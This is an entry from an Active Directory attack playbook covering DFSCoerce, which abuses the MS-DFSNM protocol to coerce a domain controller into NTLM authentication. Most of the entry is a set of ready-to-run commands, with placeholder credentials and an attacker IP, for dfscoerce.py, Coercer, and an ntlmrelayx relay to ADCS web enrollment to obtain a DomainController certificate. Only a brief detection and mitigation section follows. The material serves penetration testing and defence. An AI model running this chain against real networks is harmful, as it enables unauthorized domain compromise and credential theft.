attack-77-dfscoerce-ms-dfsnm-coercion.md (2912B)
1 --- 2 title: "Attack #77 β DFSCoerce MS-DFSNM Coercion" 3 description: "DFSCoerce abuses the MS-DFSNM (Distributed File System Namespace Management) protocol to coerce a target machine (typically a DC) into authenticating toβ¦" 4 category: active-directory 5 subcategory: "Advanced & Post-Exploitation" 6 tags: ["active-directory", "adcs", "ntlm", "relay"] 7 tools: [] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/π· Attack #77 β DFSCoerce MS-DFSNM Coercion.md" 11 --- 12 # π· Attack #77 β Coercion via DFSCoerce / MS-DFSNM 13 14 *** 15 16 ## π How It Works 17 18 DFSCoerce abuses the **MS-DFSNM** (Distributed File System Namespace Management) protocol to coerce a target machine (typically a DC) into authenticating to an attacker-controlled host. It's functionally similar to PetitPotam (#41) and PrinterBug (#42) β a coercion technique that feeds into NTLM relay chains (ESC8, RBCD, etc.). DFSCoerce requires authentication but works on fully patched DCs where PetitPotam's unauthenticated variant has been fixed. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Any domain user credentials** | Authentication required | 27 | **DFS role installed on target** | Default on DCs in many environments | 28 | **Relay target** | ADCS, LDAP, etc. | 29 30 *** 31 32 ## π» Full Commands 33 34 ```bash 35 # ββ DFSCoerce βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 36 python3 dfscoerce.py -u low_user -p 'Password1' -d corp.local \ 37 LISTENER_IP DC01.corp.local 38 39 # ββ Combined with ESC8 βββββββββββββββββββββββββββββββββββββββββββββββββββββββ 40 # Terminal 1: 41 ntlmrelayx.py -t http://CA01.corp.local/certsrv/certfnsh.asp --adcs --template DomainController 42 # Terminal 2: 43 python3 dfscoerce.py -u low_user -p 'Password1' -d corp.local ATTACKER_IP DC01.corp.local 44 45 # ββ Coercer (all-in-one β includes DFSCoerce) ββββββββββββββββββββββββββββββββ 46 coercer coerce -u low_user -p 'Password1' -d corp.local \ 47 -l LISTENER_IP -t DC01.corp.local --filter-protocol-name MS-DFSNM 48 ``` 49 50 *** 51 52 ## π‘οΈ Detection β Event IDs 53 54 | Event ID | Source | What to Look For | 55 |---|---|---| 56 | **4624** | Security Log | DC authenticating to unexpected workstation | 57 58 *** 59 60 ## π Attack Chain Context 61 62 ``` 63 [DFSCoerce] βββ NTLM Coercion via MS-DFSNM β relay to ADCS/LDAP 64 β 65 ββββ π Alternative coercion when PetitPotam is patched 66 ββββ π Chains with: ESC8 (#33), RBCD (#17), UD (#15) 67 ββββ π Defeated by: block outbound NTLM from DCs, enable EPA 68 ``` 69 70 *** 71 72 > β **Attack #77 β DFSCoerce complete.**